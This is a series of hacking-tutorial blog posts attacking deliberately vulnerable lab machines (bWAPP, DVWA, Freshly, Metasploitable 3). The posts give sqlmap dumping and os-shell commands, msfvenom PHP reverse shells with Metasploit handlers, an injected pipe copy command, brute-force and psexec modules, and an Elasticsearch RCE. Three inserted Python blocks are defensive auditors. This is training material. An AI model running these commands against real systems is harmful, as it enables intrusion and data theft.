Here's our flag. Read its contents using

cat flag.txt

Urime,

Tani nis raportin!

Which translates to:

Congratulations,

Now begins the report!
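The escalation in this walkthrough works because /etc/passwd was world-writable and a hash placed in its second field is used directly instead of the entry in /etc/shadow. The following is an added audit example of my own (not LinEnum or the post's commands): it parses passwd-format text, flags hashes stored in passwd, empty password fields and extra uid 0 accounts, and checks a file's mode for the world-writable bit; the sample passwd text is constructed and its hash is a placeholder.

```python
import os
import stat
import tempfile

# Field-2 values that defer to /etc/shadow or lock the account outright.
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> list:
    """Parse passwd-format text into dicts; lines without 7 fields are marked malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "password": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_passwd(text: str) -> list:
    """Return (account, issue) pairs for the conditions the walkthrough above creates:
    a hash in field 2 (shadow is bypassed for that account), an empty password field,
    and any uid 0 account other than root."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["name"], "malformed entry"))
            continue
        pw = e["password"]
        if pw == "":
            findings.append((e["name"], "empty password field"))
        elif pw.startswith("$"):
            findings.append((e["name"], "password hash stored in passwd instead of shadow"))
        elif pw not in SHADOWED:
            findings.append((e["name"], "unexpected password field value"))
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["name"], "additional uid 0 account"))
    return findings


def world_writable(path: str) -> bool:
    """True when the mode grants write to 'other', the condition LinEnum reported."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def demo_mode_check() -> tuple:
    """Self-contained check of world_writable() on a temp file set to 0666, then 0644."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o666)
        loose = world_writable(path)
        os.chmod(path, 0o644)
        tight = world_writable(path)
    finally:
        os.unlink(path)
    return loose, tight  # returns (True, False)


# Constructed sample: 'taviso' carries a crypt-style hash in field 2 (a placeholder,
# not a real hash), the way the walkthrough rewrites the last line of /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
taviso:$6$saltsalt$PLACEHOLDERHASH:1000:1000:taviso,,,:/home/taviso:/bin/bash
"""

if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {issue}")
    print("world-writable check (0666, 0644):", demo_mode_check())
```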

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here.

The post Hack the Hackday Albania VM (CTF Challenge) appeared first on Hacking Articles.

Database Penetration Testing using Sqlmap (Part 1)


Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

For more details visit their official site sqlmap.org.

First you need to install the bWAPP lab on your XAMPP or WAMP server; read the full article here. Now open bWAPP on your PC and log in with the following credentials.

Let’s begin!!!

Start the Apache and MySQL services in XAMPP or WAMP. Open the local host address in the browser; I am using 192.168.1.101:81/bWAPP/login.php. Enter the username and password as bee and bug respectively.

Set the security level to low, from the list box choose the bug SQL Injection (GET/SEARCH) and click on Hack.

Type any movie name in the text field and right after that start Burp Suite in Kali Linux.

To capture the bWAPP cookie, click on the Proxy tab, make sure Intercept is on, come back to bWAPP and click Submit. Use the intercepted data in the sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From the intercepted data in Burp Suite copy the referrer, cookie and target and use them in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs

The tool now analyses the URL to connect to the target, then uses SQL queries carrying the given cookie for the SQL injection attack and fetches all database names. As you can see in the image below, we have caught all the database names. Choose one to fetch more details.

I am interested in bwapp, so to fetch all tables under bwapp I type the following command in the terminal.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp --tables

Here we have got 5 table names: blog, heroes, movies, users, visitors.

Now, to dig further into a table, use the following command for each and every table.

I want to know the column details of the blog table obtained above, as you can see in the image below.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp -T blog --columns

This command fetches all columns of the blog table. It shows there are 4 columns with their data types.

To learn more about the blog table I now look inside its columns using the following command, which dumps all fields in the blog columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T blog -C date,entry,id,owner --dump

The blog table appears to be empty, as all fields are left blank.

I want to know the column details of the users table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp -T users --columns

We have got all columns of the users table with their data types.

Again I look inside its columns using the following command, which dumps all fields in the users columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T users -C id,emails,login,password,secret --dump

Here I found only two entries; as you see, sqlmap dumped only those columns which I mentioned in the command, not the whole table.

Repeat the whole process again for the movies table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T movies --columns

In the same way the tool has fetched all columns with their data types under the movies table.

Again I want to look inside its columns, so I use the same command with the table name changed.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T movies -C genre,id,imdb,main_character,release_year,tickets_stock,title --dump

Wow!! There are 10 entries; as you can see, the tool has again dumped all the data I requested.

Once again repeat the whole process for the heroes table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes --columns

We have 4 columns with their data types.

For more information, repeat the process to dump the details under its columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes -C id,login,password,secret --dump

We have got the id, login, password and secret entries. Read the details from the table.

Again repeat the same process for our last table, visitors.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors --columns

The visitors table also has 4 columns with their data types.

Let's dump its columns as well.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors -C date,id,ip_address,user_agent --dump

Cool!!! Like the blog table, it is also empty. But the task does not end here; the more interesting part begins now.

We have traversed each and every table completely, but more important than fetching table details is gaining access to an os-shell on the web server.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp --os-shell

The above command will try to upload a web backdoor; type 4 for the PHP payload and type 1 to use a common location as the writable directory.

Awesome!!!  We got the shell.

os-shell> net users

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover. Contact here.

The post Database Penetration Testing using Sqlmap (Part 1) appeared first on Hacking Articles.

Hack the Freshly VM (CTF Challenge)


Here we come with a new article, all about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It's an easy lab; let's get started and gain access to it.

Download from here

https://www.vulnhub.com/?q=fresh&sort=date-asc&type=vm

To start, we first have to find the IP of FRESHLY. For that, type the netdiscover command in a Kali terminal; it will show every IP present in our network.

TARGET IP : 192.168.1.6

Now that we have the target IP, let's scan it with an aggressive scan (-A).

nmap -p- -A 192.168.1.6

This shows all open ports: 80, 8080, 443.

As we can see, port 80 is open, so we will open the target IP in our browser to find our next clue.

Next we will run nikto against it. Nikto will help us gather information such as its files and the other major things we ought to know about our target. So, type:

The scan shows that a login.php page was found, so open it in a browser with the target IP.

As we can see, a login form pops up asking for a user and password. We will capture the cookies using Burp Suite. I have entered admin as the user and 123 as the password; you can enter anything you like.

I take these parameters and run sqlmap to see if there is a SQL injection vulnerability; if there is, we will find it in its database using sqlmap. For this, type:

sqlmap -u "http://192.168.1.6/login.php" --data="user=test&password=123&s=Submit" --risk 3 --level 3 --dbs

We have our required database right in front of us. Using SQL commands, fetch the username and password from that database, i.e. wordpress8080.

Alright, we have achieved our first step by finding the user and password for WordPress.

User = admin

Password = SuperSecretPassword

Earlier we already found our open ports, so open one of the ports not used yet in the browser, i.e. 8080.

Cool... see what you have got. Now click on this link and you are all set for the next result.

Candy goodness!!!!! It's our WordPress page. So let's move on to the next step by opening the WordPress login page and entering the credentials we found, i.e.

User= admin

Password= SuperSecretPassword

Once you have logged in, make the malicious file that you will upload into it. Generate the code with the msfvenom command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw

Side by side, in another terminal, open Metasploit and run the handler.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.6

set lport 4444

exploit

Going back to our generated raw PHP file, copy the code from <?php to die().

As we want to read a file on the system, let's put some PHP code in the theme: go to Appearance -> Themes -> 404.php and add the PHP code there so that it gets executed.

But we are not done yet: when the exploit runs it will give you a meterpreter session. Next, type shell.

Now we need a Python one-liner to get a proper terminal; to do so type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now there might be a kernel version that we could exploit, so to check its version type:

lsb_release -a

When we reload the index page we get the /etc/shadow file in the footer. We already have the flag! No need to root the system. But how did you get a root shell, you might ask :) Here's the magic:

Credential reuse: the WordPress admin password SuperSecretPassword allowed su - to escalate privileges.

Author: Priya Singh is an enthusiastic researcher and technical writer at Hacking Articles. Contact here.

The post Hack the Freshly VM (CTF Challenge) appeared first on Hacking Articles.

Hack File upload Vulnerability in DVWA (Bypass All Security)


File upload vulnerabilities are a major problem in web-based applications. On many web servers this vulnerability lets an attacker upload a file with malicious code hidden inside that can then be executed on the server. An attacker might be able to put a phishing page on the website or deface it.

An attacker may reveal internal information about the web server to others, and there is a chance that sensitive data is disclosed to unauthorized people.

In DVWA the webpage allows a user to upload an image; its code checks whether the last characters of the file name are '.jpg', '.jpeg' or '.png' before allowing the image to be uploaded into the directory.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

To set up the DVWA lab in your XAMPP or WAMP server, read the full article here.

Now open DVWA in your browser using your local IP, i.e. 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set the Website Security Level to low.

Open a terminal in Kali Linux and create a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code into Leafpad and save it with a PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click the File Upload option in the vulnerability menu.

Now click the Browse button, select hack.php, and click Upload, which will upload your file into a directory on the server.

After uploading the PHP file it will show the directory path where your file was successfully uploaded; copy the selected part and paste it into the URL to execute it.

hackable/uploads/hack.php

Before opening this URL in the browser, start multi/handler in the Metasploit framework using the commands below. While the handler is running, open the URL of the PHP file in the browser. This will give you meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 3333

msf exploit(handler) > run

meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set the Website Security Level to medium.

Use the same process to create the PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now save the selected code as raj.php.jpeg on the desktop. This file will be uploaded at medium security, which is a little different from low security because it apparently checks the file's extension.

Come back to your DVWA lab and click the File Upload option in the vulnerability menu.

Again click the Browse button and select raj.php.jpeg. Now start Burp Suite and turn Intercept on under the Proxy tab. Don't forget to set your browser's manual proxy, then click Upload.

The Intercept tab will catch the POST request when you click the Upload button. Now change raj.php.jpeg to raj.php in the request.

Compare the change before uploading your PHP file. After altering it, click Forward to upload the PHP file into the directory.

This will show the path of the uploaded file in the directory where it was successfully uploaded.

hackable/uploads/raj.php

Now repeat the same process as in low security to execute the PHP file from the URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This will give you meterpreter session 2 when you open the URL in the browser.

 meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set the Website Security Level to high.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now save the selected code as shell.jpeg on the desktop. This file will be uploaded at high security, which is a little different from low and medium security because it apparently checks the file's extension as well as its content; therefore type GIF98 before the PHP code and save it as shell.jpeg.

Repeat the process to browse and upload shell.jpeg.

Again you will get the directory path of the uploaded file.

This PHP file cannot be executed directly from the URL as it was uploaded with a jpeg extension. To rename it into a PHP file, click the Command Injection option in the vulnerability menu. This vulnerability lets you copy shell.jpeg to a new PHP file. Type the following in the text box, which copies shell.jpeg to aa.php:

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you submit the command, the file is copied under the new name aa.php.

Now repeat the process to execute the PHP file from the URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 as well.

meterpreter > sysinfo
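The three bypasses above all succeed because the upload handler trusts what the client sends: the file name's last characters, a name that can be edited in transit, or a two-byte header. As an added defender's-side example (not DVWA's own code), the Python below models the extension-only check the article describes and, next to it, a hardened validator that checks the magic bytes against the claimed type, rejects image files carrying a script marker, and stores the file under a server-generated name. The .gif entry in the allowed set and all sample files are constructed assumptions.

```python
import os
import secrets

# Allowed final extensions and the magic bytes a genuine file of that type starts with.
# .jpg/.jpeg/.png are the types the DVWA page accepts; .gif is added here (assumption)
# so the polyglot case below can be shown on a file whose header is genuinely valid.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Markers that have no business inside an image and indicate a PHP/HTML polyglot.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def weak_extension_check(filename: str) -> bool:
    """The check described above: only the last characters of the name are inspected."""
    return filename.lower().endswith((".jpg", ".jpeg", ".png"))


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Hardened check. Returns (False, reason) on rejection, or
    (True, server-generated storage name) when the file is accepted."""
    name = os.path.basename(filename)      # drop any directory components sent by the client
    _stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:           # raj.php (renamed in Burp) and hack.php stop here
        return False, f"extension {ext!r} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not start with the {ext} magic bytes"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker found inside image data (polyglot)"
    # Never reuse the client's name: a random name with the verified extension means a
    # later rename trick (like the command-injection copy above) has nothing to target.
    return True, secrets.token_hex(8) + ext


# Constructed sample files standing in for the three payloads used in the article.
PHP_STAGER = b"<?php echo 'constructed stand-in for the msfvenom stager'; ?>"
GIF_POLYGLOT = b"GIF89a" + b"\x01\x00\x01\x00\x00\x00" + PHP_STAGER
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17


def run_cases() -> dict:
    """Compare both checks on the article's payloads plus one genuine image."""
    cases = {
        "low: hack.php": ("hack.php", PHP_STAGER),
        "medium: raj.php.jpeg renamed to raj.php": ("raj.php", PHP_STAGER),
        "high: shell.jpeg with GIF header": ("shell.jpeg", GIF_POLYGLOT),
        "high: same bytes as shell.gif": ("shell.gif", GIF_POLYGLOT),
        "benign: ../uploads/photo.png": ("../uploads/photo.png", REAL_PNG),
    }
    return {label: (weak_extension_check(fn), validate_upload(fn, data))
            for label, (fn, data) in cases.items()}


if __name__ == "__main__":
    for label, (weak, hardened) in run_cases().items():
        print(f"{label:45} weak={weak!s:5} hardened={hardened}")
```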

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover. Contact here.

The post Hack File upload Vulnerability in DVWA (Bypass All Security) appeared first on Hacking Articles.


FTP Service Exploitation in Metasploitable 3


Metasploitable3 is a VM that is built from the ground up with a large number of security vulnerabilities. It is intended as a target for testing exploits with Metasploit, and hence for brushing up our Metasploit skills.

We already know that our target is Metasploitable 3, so there is no need to discover it. Let's move straight to the nmap scan.

nmap -p- -sV 192.168.1.8

We can see that the FTP port is open, so we can attack it; to do so we need a dictionary file. To make one, type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 -w /root/Desktop/dict.txt

CeWL is a tool that builds a custom wordlist from a given URL. The above command makes a dictionary file from the Metasploitable3 wiki and might help us find the password.

After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.

And then type:

use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set username vagrant

msf exploit (ftp_login)>set rhosts 192.168.1.8

msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

The module above will give you the correct password for the username. Once you have it, open WinSCP, enter the target's IP and port number along with the username vagrant and password vagrant.

Then click the Login button. After logging in you can find the files on the FTP server and use them to your advantage.

This is how you can use the FTP port to log in to the target PC. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

The post FTP Service Exploitation in Metasploitable 3 appeared first on Hacking Articles.

Hack Metasploitable 3 using Elasticsearch Exploit


Elasticsearch is a distributed RESTful search engine used in companies for analytics. Here we will learn how to exploit our target through it. Start off with nmap.

nmap -p- -A 192.168.1.8

 

Nmap shows a splendid result, in which you can see an HTTP service on port 9200 running the Elasticsearch REST API. Let's search for an exploit for it on Google.

 

YES! We have an exploit for that. Let’s use it to our advantage.

 

To use this exploit go to Metasploit and type:

use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

 

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

The post Hack Metasploitable 3 using Elasticsearch Exploit appeared first on Hacking Articles.

Metasploitable 3 Exploitation using Brute forcing SSH


Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to find the open ports and running services. I am using nmap to scan the target PC. Type the following command in a Kali Linux terminal.

nmap -p- -sV 192.168.1.8

The previous article is about the FTP login attack; read it here.

Here you can see all the open ports and their services. This article covers the SSH login attack, for which we need an open SSH port; luckily, on Metasploitable 3 port 22 is open for the SSH service. To attack it we need a dictionary file. To make one, type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 -w /root/Desktop/dict.txt

CeWL is a tool that builds a custom wordlist from a given URL. The above command makes a dictionary file from the Metasploitable3 wiki and might help us find the password.

Collect the wordlist generated by CeWL.

Start Metasploit framework by typing msfconsole on the terminal.

This module will test SSH logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login)>set rhosts 192.168.1.8

msf auxiliary (ssh_login)>set port 22

msf auxiliary (ssh_login)>set username vagrant

msf auxiliary(ssh_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary(ssh_login)>set stop_on_success true

msf auxiliary (ssh_login)> exploit

This will report the successful SSH login with username vagrant and password vagrant, and moreover opens a session with the target's shell.
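From the target's side, the ssh_login run above (and the ftp_login run in the previous article) leaves an unmistakable trace: a burst of failed logins for one user from one source, ending with a single success once stop_on_success fires. As an added defender's-side example, not part of either article, the Python below detects that pattern in sshd's auth.log format; the log lines are constructed, and the threshold and window are assumptions to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of what sshd writes to /var/log/auth.log during a wordlist
# attack: six failures for one account in five seconds, then one 'Accepted'.
# The second host (192.168.1.20) is a user who mistyped a password once.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 target sshd[2101]: Failed password for vagrant from 192.168.1.9 port 50212 ssh2
Mar  3 10:15:02 target sshd[2103]: Failed password for vagrant from 192.168.1.9 port 50214 ssh2
Mar  3 10:15:02 target sshd[2105]: Failed password for vagrant from 192.168.1.9 port 50216 ssh2
Mar  3 10:15:03 target sshd[2107]: Failed password for vagrant from 192.168.1.9 port 50218 ssh2
Mar  3 10:15:04 target sshd[2109]: Failed password for vagrant from 192.168.1.9 port 50220 ssh2
Mar  3 10:15:05 target sshd[2111]: Failed password for vagrant from 192.168.1.9 port 50222 ssh2
Mar  3 10:15:06 target sshd[2113]: Accepted password for vagrant from 192.168.1.9 port 50224 ssh2
Mar  3 10:20:00 target sshd[2150]: Failed password for alice from 192.168.1.20 port 41000 ssh2
Mar  3 10:20:30 target sshd[2152]: Accepted password for alice from 192.168.1.20 port 41002 ssh2
"""

# Matches both outcomes of a password login; 'invalid user' appears for unknown accounts.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_ts(text: str) -> datetime:
    # syslog timestamps carry no year; a fixed year is fine for computing deltas
    return datetime.strptime(text, "%b %d %H:%M:%S")


def detect_ssh_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> list:
    """Return alerts: one 'bruteforce' alert the first time a source IP reaches
    `threshold` failures within `window_seconds`, and one 'success_after_failures'
    alert if that same IP later gets an 'Accepted' line (the stop_on_success pattern)."""
    recent = defaultdict(deque)      # ip -> timestamps of failures inside the window
    total_failures = defaultdict(int)
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, user = parse_ts(m["ts"]), m["ip"], m["user"]
        if m["result"] == "Failed":
            window = recent[ip]
            window.append(ts)
            total_failures[ip] += 1
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip, "user": user,
                               "failures_in_window": len(window)})
        elif ip in flagged:
            # The attack found a valid password: the account is now compromised.
            alerts.append({"type": "success_after_failures", "ip": ip, "user": user,
                           "prior_failures": total_failures[ip]})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

A single mistyped password (alice) produces no alert; only a source that crossed the failure threshold is reported, and its later success is escalated separately.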

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover. Contact here.

The post Metasploitable 3 Exploitation using Brute forcing SSH appeared first on Hacking Articles.

Hack Metasploitable 3 using SMB Service Exploitation


Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to find the open ports and running services. I am using nmap to scan the target PC. Nmap shows all the open ports and their services; this article covers the SMB login attack, which requires an open SMB port.

Type the following command on terminal in kali Linux.

nmap -p- -A 192.168.1.11

The previous article is about the SSH login attack; read it here.

Luckily!!! On Metasploitable 3 port 445 is open for the SMB service, which is mainly used for shared access to files, printers and serial ports, and for miscellaneous communication between server and client on a network.

Now we need to create a dictionary file to attack it. To make one, type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 -w /root/Desktop/pass.txt

CeWL is a custom wordlist generator that spiders only the site you specify, to a configurable depth (2 links by default), and returns a list of words which can then be used by password crackers such as John the Ripper.

Start the Metasploit framework by typing msfconsole in a Kali Linux terminal.

This module will test SMB logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.

Type the following commands in msfconsole:

use auxiliary/scanner/smb/smb_login

msf auxiliary (smb_login)>set rhosts 192.168.1.11

msf auxiliary (smb_login)>set rport 445

msf auxiliary (smb_login)>set smbuser vagrant

msf auxiliary (smb_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary (smb_login)>set stop_on_success true

msf auxiliary (smb_login)> exploit

This module will start a brute-force attack to find valid credentials and prints a green success line when it finds the correct SMB login.

Our attack is successful and we have a valid login: vagrant as both username and password.

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

Hence, using the above credentials, this exploit will try to give us a meterpreter shell.

Type the following commands to use this module for the attack.

msf> use exploit/windows/smb/psexec

msf exploit (psexec)>set rhosts 192.168.1.11

msf exploit (psexec)>set rport 445

msf exploit (psexec)>set smbuser vagrant

msf exploit (psexec)>set smbpass vagrant

msf exploit (psexec)> exploit

Wonderful!!! Meterpreter session 1 is opened and you have the target's shell.

meterpreter> sysinfo

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover. Contact here.

The post Hack Metasploitable 3 using SMB Service Exploitation appeared first on Hacking Articles.

Perform DOS Attack on Metasploitable 3


Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to find the open ports and running services. Use nmap to scan the target PC. Type the following command in a Kali Linux terminal to run an aggressive scan.

nmap -p- -A 192.168.1.14

From the scan result we find that port 3389 is open for the Remote Desktop service, and on open port 80 the HTTP server header shows Microsoft IIS 7.5.

